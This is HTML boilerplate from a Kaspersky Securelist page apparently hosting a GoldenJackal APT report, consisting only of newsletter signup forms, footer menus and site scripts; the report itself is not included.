<p>The hottest research right in your inbox</p> </div> </div> <div class="o-col u-flex-shrink-0 u-flex-grow"> <div class="c-form--newsletter u-ml-auto"> <div class='gf_browser_chrome gform_wrapper gform_wrapper_original_id_11 gravity-theme subscribe-mc_wrapper' id='gform_wrapper_1477694771' ><div id='gf_1477694771' class='gform_anchor' tabindex='-1'></div><form method='post' enctype='multipart/form-data' target='gform_ajax_frame_1477694771' id='gform_1477694771' class='subscribe-mc' action='/goldenjackal-apt-group/109677/#gf_1477694771' > <div class="gform-content-wrapper"><div class='gform_body gform-body'><div id='gform_fields_1477694771' class='gform_fields top_label form_sublabel_below description_below'><div id="field_11_1" class="gfield gfield_contains_required field_sublabel_below field_description_below gfield_visibility_visible" ><label class='gfield_label screen-reader-text' for='input_1477694771_1' >Email<span class="gfield_required"><span class="gfield_required gfield_required_text">(Required)</span></span></label><div class='ginput_container ginput_container_email'> <input name='input_1' id='input_1477694771_1' type='text' value='' class='medium' placeholder='Email' aria-required="true" aria-invalid="false" /> </div></div><div id="field_11_3" class="gfield js-kaspersky-gform-recaptcha-placeholder gform_hidden field_sublabel_below field_description_below gfield_visibility_hidden" ><div class='ginput_container ginput_container_text'><input name='input_3' id='input_1477694771_3' type='hidden' class='gform_hidden' aria-invalid="false" value='' /></div></div><fieldset id="field_11_2" class="gfield input-without-label label-gdpr gfield_contains_required field_sublabel_below field_description_below gfield_visibility_visible" ><legend class='gfield_label screen-reader-text gfield_label_before_complex' ><span class="gfield_required"><span class="gfield_required gfield_required_text">(Required)</span></span></legend><div class='ginput_container ginput_container_checkbox'><div class='gfield_checkbox' id='input_1477694771_2'><div class='gchoice gchoice_11_2_1'> <input class='gfield-choice-input' name='input_2.1' type='checkbox' value='I agree' id='choice_1477694771_11_2_1' /> <label for='choice_1477694771_11_2_1' id='label_1477694771_11_2_1'>I agree to provide my email address to “AO Kaspersky Lab” to receive information about new posts on the site. I understand that I can withdraw this consent at any time via e-mail by clicking the “unsubscribe” link that I find at the bottom of any e-mail sent to me for the purposes mentioned above.</label> </div></div></div></fieldset></div></div> <div class='gform_footer top_label'> <button class="gform_button button" type="submit" id='gform_submit_button_1477694771' value="Sign up"> <svg class="o-icon o-svg-icon o-svg-large u-hidden u-inline-block@sm"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-envelope"></use></svg> <span class="u-hidden u-inline@sm">Subscribe</span> <span class="u-hidden@sm"><svg class="o-icon o-svg-icon o-svg-right"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-arrow"></use></svg></span> </button> <input type='hidden' name='gform_ajax' value='form_id=11&amp;title=&amp;description=&amp;tabindex=0' /> <input type='hidden' class='gform_hidden' name='is_submit_11' value='1' /> <input type='hidden' class='gform_hidden' name='gform_submit' value='11' /> <input type='hidden' class='gform_hidden' name='gform_unique_id' value='' /> <input type='hidden' class='gform_hidden' name='state_11' value='WyJbXSIsImIwODQwZTA2ZGQ0NzYwODcyOTBkZjNmZDM1NDk2Y2ZkIl0=' /> <input type='hidden' class='gform_hidden' name='gform_target_page_number_11' id='gform_target_page_number_1477694771_11' value='0' /> <input type='hidden' class='gform_hidden' name='gform_source_page_number_11' id='gform_source_page_number_1477694771_11' value='1' /> <input type='hidden' name='gform_random_id' value='1477694771' /><input type='hidden' name='gform_field_values' value='securelist_2020_form_location=' /> </div> </div><p style="display: none !important;" class="akismet-fields-container" data-prefix="ak_"><label>&#916;<textarea name="ak_hp_textarea" cols="45" rows="8" maxlength="100"></textarea></label><input type="hidden" id="ak_js_3" name="ak_js" value="7"/><script>document.getElementById( "ak_js_3" ).setAttribute( "value", ( new Date() ).getTime() );</script></p></form> </div> <iframe style='display:none;width:0px;height:0px;' src='about:blank' name='gform_ajax_frame_1477694771' id='gform_ajax_frame_1477694771' title='This iframe contains the logic required to handle Ajax powered Gravity Forms.'></iframe> <script type="text/javascript"> /* <![CDATA[ */ gform.initializeOnLoaded( function() {gformInitSpinner( 1477694771, 'https://securelist.com/wp-content/themes/securelist2020/assets/images/content/ajax-spinner-red.svg' );jQuery('#gform_ajax_frame_1477694771').on('load',function(){var contents = jQuery(this).contents().find('*').html();var is_postback = contents.indexOf('GF_AJAX_POSTBACK') >= 0;if(!is_postback){return;}var form_content = jQuery(this).contents().find('#gform_wrapper_1477694771');var is_confirmation = jQuery(this).contents().find('#gform_confirmation_wrapper_1477694771').length > 0;var is_redirect = contents.indexOf('gformRedirect(){') >= 0;var is_form = form_content.length > 0 && ! is_redirect && ! is_confirmation;var mt = parseInt(jQuery('html').css('margin-top'), 10) + parseInt(jQuery('body').css('margin-top'), 10) + 100;if(is_form){jQuery('#gform_wrapper_1477694771').html(form_content.html());if(form_content.hasClass('gform_validation_error')){jQuery('#gform_wrapper_1477694771').addClass('gform_validation_error');} else {jQuery('#gform_wrapper_1477694771').removeClass('gform_validation_error');}setTimeout( function() { /* delay the scroll by 50 milliseconds to fix a bug in chrome */ jQuery(document).scrollTop(jQuery('#gform_wrapper_1477694771').offset().top - mt); }, 50 );if(window['gformInitDatepicker']) {gformInitDatepicker();}if(window['gformInitPriceFields']) {gformInitPriceFields();}var current_page = jQuery('#gform_source_page_number_1477694771_11').val();gformInitSpinner( 1477694771, 'https://securelist.com/wp-content/themes/securelist2020/assets/images/content/ajax-spinner-red.svg' );jQuery(document).trigger('gform_page_loaded', [1477694771, current_page]);window['gf_submitting_1477694771'] = false;}else if(!is_redirect){var confirmation_content = jQuery(this).contents().find('.GF_AJAX_POSTBACK').html();if(!confirmation_content){confirmation_content = contents;}setTimeout(function(){jQuery('#gform_wrapper_1477694771').replaceWith(confirmation_content);jQuery(document).scrollTop(jQuery('#gf_1477694771').offset().top - mt);jQuery(document).trigger('gform_confirmation_loaded', [1477694771]);window['gf_submitting_1477694771'] = false;wp.a11y.speak(jQuery('#gform_confirmation_message_1477694771').text());}, 50);}else{jQuery('#gform_1477694771').append(contents);if(window['gformRedirect']) {gformRedirect();}}jQuery(document).trigger('gform_post_render', [1477694771, current_page]);} );} ); /* ]]> */ </script> </div> </div> </div> <div class="u-hidden@sm u-mb-spacer-base-"> <div class="c-image c-image--overflow-down@sm"> <a href="https://xtraining.kaspersky.com/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_ban_sm-team___xtraining____db5c7a1470cf39c3"><img src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/12/30141758/xTraining-evergreen-banner_800x800_EN-740x740.jpg" /></a> </div> </div> </div> </section> </div><!-- /.c-page --> <section class="c-block c-block--spacing-t-small c-block--spacing-t-large@md c-block--spacing-b c-page-footer c-block--bg-image c-color--invert" style="background-image: url(https://securelist.com/wp-content/themes/securelist2020/assets/images/content/bg-gradient-02.jpg);"> <div class="o-container-fluid"> <div data-element-id="footer-content-block" class="c-page-footer__content"> <div class="o-row o-row--reverse"> <div class="o-col-9@md"> <div class="c-page-menu"> <div class="o-row c-page-menu__dividers"> <div class="o-col-4@md"><div class="c-accordion js-accordion c-accordion--reset@md"><p class="menu-item-threats section-title accordion menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-226 c-page-menu__title u-hidden u-block@md"><a href="https://securelist.com/threat-categories/" data-element-id="footer-content-link">Threats</a></p><div class="c-accordion-toggle js-accordion-toggle"><p>Threats</p></div><div class="c-accordion-container js-accordion-container"> <ul class="sub-menu"> <li class="menu-item menu-item-type-taxonomy menu-item-object-threat-category current-post-ancestor current-menu-parent current-post-parent menu-item-99839"><a href="https://securelist.com/threat-category/apt-targeted-attacks/" data-element-id="footer-content-link">APT (Targeted attacks)</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-89457"><a href="https://securelist.com/threat-category/secure-environment/" data-element-id="footer-content-link">Secure environment (IoT)</a></li> <li class="topic-item vulnerabilities menu-item menu-item-type-custom menu-item-object-custom menu-item-63231"><a href="https://securelist.com/threat-category/mobile-threats/" data-element-id="footer-content-link">Mobile threats</a></li> <li class="topic-item detected menu-item menu-item-type-custom menu-item-object-custom menu-item-63229"><a href="https://securelist.com/threat-category/financial-threats/" data-element-id="footer-content-link">Financial threats</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-89458"><a href="https://securelist.com/threat-category/spam-and-phishing/" data-element-id="footer-content-link">Spam and phishing</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-threat-category menu-item-99840"><a href="https://securelist.com/threat-category/industrial-threats/" data-element-id="footer-content-link">Industrial threats</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-threat-category menu-item-89465"><a href="https://securelist.com/threat-category/web-threats/" data-element-id="footer-content-link">Web threats</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-89459"><a href="https://securelist.com/threat-category/vulnerabilities-and-exploits/" data-element-id="footer-content-link">Vulnerabilities and exploits</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-113855"><a href="https://securelist.com/threat-categories/" data-element-id="footer-content-link">All threats</a></li> </ul> </li> </li></ul></div></div></div><div class="o-col-4@md"><div class="c-accordion js-accordion c-accordion--reset@md"><p class="menu-item-categories section-title accordion menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-230 c-page-menu__title u-hidden u-block@md"><a href="https://securelist.com/categories/" data-element-id="footer-content-link">Categories</a></p><div class="c-accordion-toggle js-accordion-toggle"><p>Categories</p></div><div class="c-accordion-container js-accordion-container"> <ul class="sub-menu"> <li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-84158"><a href="https://securelist.com/category/apt-reports/" data-element-id="footer-content-link">APT reports</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-99841"><a href="https://securelist.com/category/malware-descriptions/" data-element-id="footer-content-link">Malware descriptions</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-84160"><a href="https://securelist.com/category/kaspersky-security-bulletin/" data-element-id="footer-content-link">Security Bulletin</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-84161"><a href="https://securelist.com/category/malware-reports/" data-element-id="footer-content-link">Malware reports</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-89460"><a href="https://securelist.com/category/spam-and-phishing-reports/" data-element-id="footer-content-link">Spam and phishing reports</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-99842"><a href="https://securelist.com/category/security-technologies/" data-element-id="footer-content-link">Security technologies</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-84165"><a href="https://securelist.com/category/research/" data-element-id="footer-content-link">Research</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-84164"><a href="https://securelist.com/category/publications/" data-element-id="footer-content-link">Publications</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-113876"><a href="https://securelist.com/categories/" data-element-id="footer-content-link">All categories</a></li> </ul> </li> </li></ul></div></div></div><div class="o-col-4@md"><p class="menu-item-tags section-title after-accordion menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-277 c-page-menu__title u-hidden u-block@md"><a data-element-id="footer-content-link">Other sections</a></p> <ul class="sub-menu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-100526"><a href="https://securelist.com/all/" data-element-id="footer-content-link">Archive</a></li> <li class="show-all-tags menu-item menu-item-type-post_type menu-item-object-page menu-item-57837"><a href="https://securelist.com/tags/" data-element-id="footer-content-link">All tags</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-101956"><a href="https://securelist.com/webinars/" data-element-id="footer-content-link">Webinars</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-101126"><a target="_blank" rel="noopener noreferrer" href="https://apt.securelist.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="footer-content-link">APT Logbook</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-241"><a target="_blank" rel="noopener noreferrer" href="https://statistics.securelist.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="footer-content-link">Statistics</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-86643"><a target="_blank" rel="noopener noreferrer" href="https://encyclopedia.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="footer-content-link">Encyclopedia</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-58141"><a target="_blank" rel="noopener noreferrer" href="https://threats.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="footer-content-link">Threats descriptions</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-115044"><a href="https://securelist.com/ksb-2024/" data-element-id="footer-content-link">KSB 2024</a></li> </ul> </li> </div> </div> </div> </div> <div class="o-col-3@md"> <div class="c-site-logo c-site-logo--kaspersky"></div> </div> </div> </div> <div data-element-id="footer-menu-block" class="c-page-footer__wrapper"> <div class="c-page-footer__info"> <p>© 2025 AO Kaspersky Lab. All Rights Reserved.<br /> Registered trademarks and service marks are the property of their respective owners.</p> </div> <div class="c-page-footer__links"> <ul> <li><a data-element-id="footer-menu-link" href="https://www.kaspersky.com/web-privacy-policy?icid=gl_seclistfooter_acq_ona_smm__onl_b2b_securelist_footer_sm-team_______11d7a8212d94123d">Privacy Policy</a></li> <li><a data-element-id="footer-menu-link" href="https://www.kaspersky.com/end-user-license-agreement?icid=gl_seclistfooter_acq_ona_smm__onl_b2b_securelist_footer_sm-team_______11d7a8212d94123d">License Agreement</a></li> <li><a data-element-id="footer-menu-link" href="javascript: void(0);" onclick="javascript: Cookiebot.renew()">Cookies</a></li> </ul> </div> </div> </div> </section> <div id="modal-newsletter" class="c-modal__wrapper c-modal__wrapper--sm mfp-hide"> <div class="c-modal"> <a href="#" class="c-modal-close js-modal-close"></a> <div class="c-modal__main"> <div class="c-block c-block--spacing-t-small c-block--spacing-b-small"> <div class="o-container-fluid"> <div class="c-block__header"> <h5 class="c-title--small">Subscribe to our weekly e-mails</h5> <p>The hottest research right in your inbox</p> </div> <div class="c-form--float-labels js-float-labels"> <div class='gf_browser_chrome gform_wrapper gform_wrapper_original_id_11 gravity-theme subscribe-mc_wrapper' id='gform_wrapper_2875886091' ><div id='gf_2875886091' class='gform_anchor' tabindex='-1'></div><form method='post' enctype='multipart/form-data' target='gform_ajax_frame_2875886091' id='gform_2875886091' class='subscribe-mc' action='/goldenjackal-apt-group/109677/#gf_2875886091' > <div class="gform-content-wrapper"><div class='gform_body gform-body'><div id='gform_fields_2875886091' class='gform_fields top_label form_sublabel_below description_below'><div id="field_11_1" class="gfield gfield_contains_required field_sublabel_below field_description_below gfield_visibility_visible" ><label class='gfield_label screen-reader-text' for='input_2875886091_1' >Email<span class="gfield_required"><span class="gfield_required gfield_required_text">(Required)</span></span></label><div class='ginput_container ginput_container_email'> <input name='input_1' id='input_2875886091_1' type='text' value='' class='medium' placeholder='Email' aria-required="true" aria-invalid="false" /> </div></div><div id="field_11_3" class="gfield js-kaspersky-gform-recaptcha-placeholder gform_hidden field_sublabel_below field_description_below gfield_visibility_hidden" ><div class='ginput_container ginput_container_text'><input name='input_3' id='input_2875886091_3' type='hidden' class='gform_hidden' aria-invalid="false" value='' /></div></div><fieldset id="field_11_2" class="gfield input-without-label label-gdpr gfield_contains_required field_sublabel_below field_description_below gfield_visibility_visible" ><legend class='gfield_label screen-reader-text gfield_label_before_complex' ><span class="gfield_required"><span class="gfield_required gfield_required_text">(Required)</span></span></legend><div class='ginput_container ginput_container_checkbox'><div class='gfield_checkbox' id='input_2875886091_2'><div class='gchoice gchoice_11_2_1'> <input class='gfield-choice-input' name='input_2.1' type='checkbox' value='I agree' id='choice_2875886091_11_2_1' /> <label for='choice_2875886091_11_2_1' id='label_2875886091_11_2_1'>I agree to provide my email address to “AO Kaspersky Lab” to receive information about new posts on the site. I understand that I can withdraw this consent at any time via e-mail by clicking the “unsubscribe” link that I find at the bottom of any e-mail sent to me for the purposes mentioned above.</label> </div></div></div></fieldset></div></div> <div class='gform_footer top_label'> <button type="submit" class="gform_button button" id='gform_submit_button_2875886091' value="Sign up"> <svg class="o-icon o-svg-icon o-svg-large"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-envelope"></use></svg> <span>Subscribe</span> </button> <input type='hidden' name='gform_ajax' value='form_id=11&amp;title=&amp;description=&amp;tabindex=0' /> <input type='hidden' class='gform_hidden' name='is_submit_11' value='1' /> <input type='hidden' class='gform_hidden' name='gform_submit' value='11' /> <input type='hidden' class='gform_hidden' name='gform_unique_id' value='' /> <input type='hidden' class='gform_hidden' name='state_11' value='WyJbXSIsImIwODQwZTA2ZGQ0NzYwODcyOTBkZjNmZDM1NDk2Y2ZkIl0=' /> <input type='hidden' class='gform_hidden' name='gform_target_page_number_11' id='gform_target_page_number_2875886091_11' value='0' /> <input type='hidden' class='gform_hidden' name='gform_source_page_number_11' id='gform_source_page_number_2875886091_11' value='1' /> <input type='hidden' name='gform_random_id' value='2875886091' /><input type='hidden' name='gform_field_values' value='securelist_2020_form_location=sidebar' /> </div> </div><p style="display: none !important;" class="akismet-fields-container" data-prefix="ak_"><label>&#916;<textarea name="ak_hp_textarea" cols="45" rows="8" maxlength="100"></textarea></label><input type="hidden" id="ak_js_4" name="ak_js" value="159"/><script>document.getElementById( "ak_js_4" ).setAttribute( "value", ( new Date() ).getTime() );</script></p></form> </div> <iframe style='display:none;width:0px;height:0px;' src='about:blank' name='gform_ajax_frame_2875886091' id='gform_ajax_frame_2875886091' title='This iframe contains the logic required to handle Ajax powered Gravity Forms.'></iframe> <script type="text/javascript"> /* <![CDATA[ */ gform.initializeOnLoaded( function() {gformInitSpinner( 2875886091, 'https://securelist.com/wp-content/themes/securelist2020/assets/images/content/ajax-spinner-red.svg' );jQuery('#gform_ajax_frame_2875886091').on('load',function(){var contents = jQuery(this).contents().find('*').html();var is_postback = contents.indexOf('GF_AJAX_POSTBACK') >= 0;if(!is_postback){return;}var form_content = jQuery(this).contents().find('#gform_wrapper_2875886091');var is_confirmation = jQuery(this).contents().find('#gform_confirmation_wrapper_2875886091').length > 0;var is_redirect = contents.indexOf('gformRedirect(){') >= 0;var is_form = form_content.length > 0 && ! is_redirect && ! is_confirmation;var mt = parseInt(jQuery('html').css('margin-top'), 10) + parseInt(jQuery('body').css('margin-top'), 10) + 100;if(is_form){jQuery('#gform_wrapper_2875886091').html(form_content.html());if(form_content.hasClass('gform_validation_error')){jQuery('#gform_wrapper_2875886091').addClass('gform_validation_error');} else {jQuery('#gform_wrapper_2875886091').removeClass('gform_validation_error');}setTimeout( function() { /* delay the scroll by 50 milliseconds to fix a bug in chrome */ jQuery(document).scrollTop(jQuery('#gform_wrapper_2875886091').offset().top - mt); }, 50 );if(window['gformInitDatepicker']) {gformInitDatepicker();}if(window['gformInitPriceFields']) {gformInitPriceFields();}var current_page = jQuery('#gform_source_page_number_2875886091_11').val();gformInitSpinner( 2875886091, 'https://securelist.com/wp-content/themes/securelist2020/assets/images/content/ajax-spinner-red.svg' );jQuery(document).trigger('gform_page_loaded', [2875886091, current_page]);window['gf_submitting_2875886091'] = false;}else if(!is_redirect){var confirmation_content = jQuery(this).contents().find('.GF_AJAX_POSTBACK').html();if(!confirmation_content){confirmation_content = contents;}setTimeout(function(){jQuery('#gform_wrapper_2875886091').replaceWith(confirmation_content);jQuery(document).scrollTop(jQuery('#gf_2875886091').offset().top - mt);jQuery(document).trigger('gform_confirmation_loaded', [2875886091]);window['gf_submitting_2875886091'] = false;wp.a11y.speak(jQuery('#gform_confirmation_message_2875886091').text());}, 50);}else{jQuery('#gform_2875886091').append(contents);if(window['gformRedirect']) {gformRedirect();}}jQuery(document).trigger('gform_post_render', [2875886091, current_page]);} );} ); /* ]]> */ </script> </div> </div> </div> </div><!-- /.c-modal__main --> </div><!-- /.c-modal --> </div><!-- /.c-modal__wrapper --> <script type="text/javascript"> if ( typeof _recaptcha_wordpress_savedcomment != 'undefined') { document.getElementById('comment').value = _recaptcha_wordpress_savedcomment; } </script><script type="text/javascript" src="https://kasperskycontenthub.com/securelist/wp-content/plugins/kaspersky-embeds/js/scripts.js?ver=1.0" id="kspr_embeds-js"></script> <script type="text/javascript" src="https://www.google.com/recaptcha/api.js?render=explicit&amp;ver=202124050927" id="kaspersky-dynamic-gravity-forms-google-recaptcha-js"></script> <script type="text/javascript" id="crayon_js-js-extra"> /* <![CDATA[ */ var CrayonSyntaxSettings = {"version":"_2.7.2_beta","is_admin":"0","ajaxurl":"https:\/\/securelist.com\/wp-admin\/admin-ajax.php","prefix":"crayon-","setting":"crayon-setting","selected":"crayon-setting-selected","changed":"crayon-setting-changed","special":"crayon-setting-special","orig_value":"data-orig-value","debug":""}; var CrayonSyntaxStrings = {"copy":"Press %s to Copy, %s to Paste","minimize":"Click To Expand Code"}; /* ]]> */ </script> <script type="text/javascript" id="kaspersky-dynamic-gravity-forms-main-js-extra"> /* <![CDATA[ */ var kasperskyDynamicaReCaptchaData = {"ajaxUrl":"https:\/\/securelist.com\/wp-admin\/admin-ajax.php"}; /* ]]> */ </script> <script type="text/javascript" id="kaspersky-omniture-js-extra"> /* <![CDATA[ */ var kaspersky = {"pageName":"Kaspersky Securelist","pageType":"blog","platformName":"Micro Site","businessType":"b2c","siteLocale":"en-GLOBAL"}; /* ]]> */ </script> <script type="text/javascript" id="wp-autosearch-script-js-extra"> /* <![CDATA[ */ var wp_autosearch_config = {"autocomplete_taxonomies":{"0":"category"},"split_results_by_type":"true","search_title":"true","search_content":"false","search_terms":"false","search_exactonly":"true","order_by":"title","order":"DESC","search_comments":"false","search_tags":"false","no_of_results":"5","description_limit":"100","title_limit":"50","excluded_ids":{},"excluded_cats":{"0":0},"full_search_url":"https:\/\/kasperskycontenthub.com\/securelist\/?s=%q%","min_chars":"3","ajax_delay":"200","cache_length":"200","autocomplete_sortorder":"posts","thumb_image_display":"false","thumb_image_width":"50","thumb_image_height":"50","get_first_image":"true","force_resize_first_image":"true","thumb_image_crop":"true","default_image":"https:\/\/kasperskycontenthub.com\/securelist\/wp-content\/plugins\/wp-autosearch\/assert\/image\/default.png","search_image":"","display_more_bar":"false","display_result_title":"false","enable_token":"true","custom_css":"","custom_js":"","try_full_search_text":"Search more...","no_results_try_full_search_text":"No Results!","show_author":"false","show_date":"false","description_result":"false","color":{"results_even_bar":"E8E8E8","results_odd_bar":"FFFFFF","results_even_text":"000000","results_odd_text":"000000","results_hover_bar":"5CCCB2","results_hover_text":"FFFFFF","seperator_bar":"2D8DA0","seperator_hover_bar":"6A81A0","seperator_text":"FFFFFF","seperator_hover_text":"FFFFFF","more_bar":"5286A0","more_hover_bar":"4682A0","more_text":"FFFFFF","more_hover_text":"FFFFFF","box_border":"57C297","box_background":"FFFFFF","box_text":"000000"},"title":{"page":"Pages","post":"Posts","webinars":"Webinars"},"post_types":{"0":"page","1":"post","2":"webinars"},"nonce":"cd5b7c7657","ajax_url":"https:\/\/securelist.com\/wp-admin\/admin-ajax.php"}; /* ]]> */ </script> <script type="text/javascript" id="securelist-script-js-extra"> /* <![CDATA[ */ var securelist2020Data = {"ajaxUrl":"https:\/\/securelist.com\/wp-admin\/admin-ajax.php","loading":"Loading...","marketoBaseURL":"","marketoVirtualForm":"27241","munchkinID":"802-IJN-240","reCaptcha_key":"6Lf2eUQUAAAAAC-GQSZ6R2pjePmmD6oA6F_3AV7j"}; /* ]]> */ </script> <script type='text/javascript' src='//assets.kasperskycontenthub.com/wp-content/plugins/bwp-minify/min/?f=wp-content/plugins/crayon-syntax-highlighter/js/min/crayon.min.js,wp-content/plugins/kaspersky-gravity-forms-dynamic-recaptcha/assets/js/main.js,wp-content/plugins/kaspersky-lazy-load/assets/js/main.js,wp-content/plugins/kaspersky-omniture/assets/dataLayer.js,wp-content/plugins/kaspersky-wp-autosearch/assert/js/migrate.js,wp-content/plugins/kaspersky-wp-autosearch/assert/js/autocomplete.js,wp-content/plugins/kaspersky-wp-autosearch/assert/js/ajax-script.js,wp-content/plugins/wds-no-login-autocomplete/js/script.js,wp-content/themes/securelist2020/assets/js/main.js,wp-includes/js/comment-reply.min.js'></script> <script type='text/javascript' src='//assets.kasperskycontenthub.com/wp-content/plugins/bwp-minify/min/?f=wp-content/plugins/akismet/_inc/akismet-frontend.js,wp-includes/js/dist/dom-ready.min.js,wp-includes/js/dist/hooks.min.js,wp-includes/js/dist/i18n.min.js,wp-includes/js/dist/a11y.min.js'></script> <script type="text/javascript" defer='defer' src="https://securelist.com/wp-content/plugins/gravityforms/js/jquery.json.min.js?ver=2.5.16.3" id="gform_json-js"></script> <script type="text/javascript" id="gform_gravityforms-js-extra"> /* <![CDATA[ */ var gform_i18n = {"datepicker":{"days":{"monday":"Mon","tuesday":"Tue","wednesday":"Wed","thursday":"Thu","friday":"Fri","saturday":"Sat","sunday":"Sun"},"months":{"january":"January","february":"February","march":"March","april":"April","may":"May","june":"June","july":"July","august":"August","september":"September","october":"October","november":"November","december":"December"},"firstDay":1,"iconText":"Select date"}}; var gf_global = {"gf_currency_config":{"name":"U.S. Dollar","symbol_left":"$","symbol_right":"","symbol_padding":"","thousand_separator":",","decimal_separator":".","decimals":2,"code":"USD"},"base_url":"https:\/\/securelist.com\/wp-content\/plugins\/gravityforms","number_formats":[],"spinnerUrl":"https:\/\/securelist.com\/wp-content\/plugins\/gravityforms\/images\/spinner.svg","strings":{"newRowAdded":"New row added.","rowRemoved":"Row removed","formSaved":"The form has been saved. The content contains the link to return and complete the form."}}; var gf_legacy_multi = {"11":""}; var gf_global = {"gf_currency_config":{"name":"U.S. Dollar","symbol_left":"$","symbol_right":"","symbol_padding":"","thousand_separator":",","decimal_separator":".","decimals":2,"code":"USD"},"base_url":"https:\/\/securelist.com\/wp-content\/plugins\/gravityforms","number_formats":[],"spinnerUrl":"https:\/\/securelist.com\/wp-content\/plugins\/gravityforms\/images\/spinner.svg","strings":{"newRowAdded":"New row added.","rowRemoved":"Row removed","formSaved":"The form has been saved. The content contains the link to return and complete the form."}}; var gf_legacy_multi = {"11":""}; var gf_global = {"gf_currency_config":{"name":"U.S. Dollar","symbol_left":"$","symbol_right":"","symbol_padding":"","thousand_separator":",","decimal_separator":".","decimals":2,"code":"USD"},"base_url":"https:\/\/securelist.com\/wp-content\/plugins\/gravityforms","number_formats":[],"spinnerUrl":"https:\/\/securelist.com\/wp-content\/plugins\/gravityforms\/images\/spinner.svg","strings":{"newRowAdded":"New row added.","rowRemoved":"Row removed","formSaved":"The form has been saved. The content contains the link to return and complete the form."}}; var gf_legacy_multi = {"11":""}; /* ]]> */ </script> <script type="text/javascript" defer='defer' src="https://securelist.com/wp-content/plugins/gravityforms/js/gravityforms.min.js?ver=2.5.16.3" id="gform_gravityforms-js"></script> <script type="text/javascript" defer='defer' src="https://securelist.com/wp-content/plugins/gravityforms/js/placeholders.jquery.min.js?ver=2.5.16.3" id="gform_placeholder-js"></script> <script type="text/javascript"> /* <![CDATA[ */ gform.initializeOnLoaded( function() { jQuery(document).on('gform_post_render', function(event, formId, currentPage){if(formId == 11) {if(typeof Placeholders != 'undefined'){ Placeholders.enable(); }} } );jQuery(document).bind('gform_post_conditional_logic', function(event, formId, fields, isInit){} ) } ); /* ]]> */ </script> <script type="text/javascript"> /* <![CDATA[ */ gform.initializeOnLoaded( function() { jQuery(document).trigger('gform_post_render', [11, 1]) } ); /* ]]> */ </script> </body> </html>